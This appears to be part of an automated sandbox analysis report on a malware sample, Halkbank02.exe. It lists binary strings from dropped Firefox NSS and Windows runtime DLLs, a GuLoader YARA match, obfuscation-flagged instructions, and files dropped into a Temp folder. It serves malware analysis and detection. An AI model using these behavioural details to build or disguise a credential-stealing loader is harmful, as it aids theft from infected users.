      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.869027129.000000001F838000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000002.901129963.000000001F860000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876256297.000000001F478000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: msvcp140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-profile-l1-1-0.dll.28.dr
      Source: Binary string: ucrtbase.pdbUGP source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.870977200.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processenvironment-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.868789686.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.869710011.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-1.dll.28.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-namedpipe-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876736098.000000001F4B0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-rtlsupport-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-string-l1-1-0.dll.28.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.871542123.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.28.dr

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00403640 push 966DCA76h; iretd 1_2_00403645
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00405A45 push esp; iretd 1_2_00405A5A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00403C65 push ds; iretd 1_2_00403C6E
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00405E73 push ds; iretd 1_2_00405E8A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00404A75 push 7B3E4015h; iretd 1_2_00404A7A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00407231 push esp; retf 1_2_00407234
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004080C5 push E868A7E5h; iretd 1_2_004080CA
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00406ED7 push esi; ret 1_2_00406ED8
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004082EB pushfd ; iretd 1_2_004082F5
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004080ED push 7767F77Ch; iretd 1_2_004080F2
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00408105 push 03C6A3FEh; iretd 1_2_00408112
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00407B29 pushfd ; retf 1_2_00407B2A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004061DD push 22BD4488h; iretd 1_2_004061E6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A7409 pushfd ; iretd 1_2_022A7412
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E531696 push cs; ret 28_3_1E5316A2
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E53394D push esi; ret 28_3_1E533997
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E53430B push cs; ret 28_3_1E53432A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E53298B pushad ; ret 28_3_1E53299F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E5323B5 push cs; ret 28_3_1E5323B6
      Source: msvcp140.dll.28.drStatic PE information: section name: .didat
      Source: api-ms-win-core-console-l1-1-0.dll.28.drStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll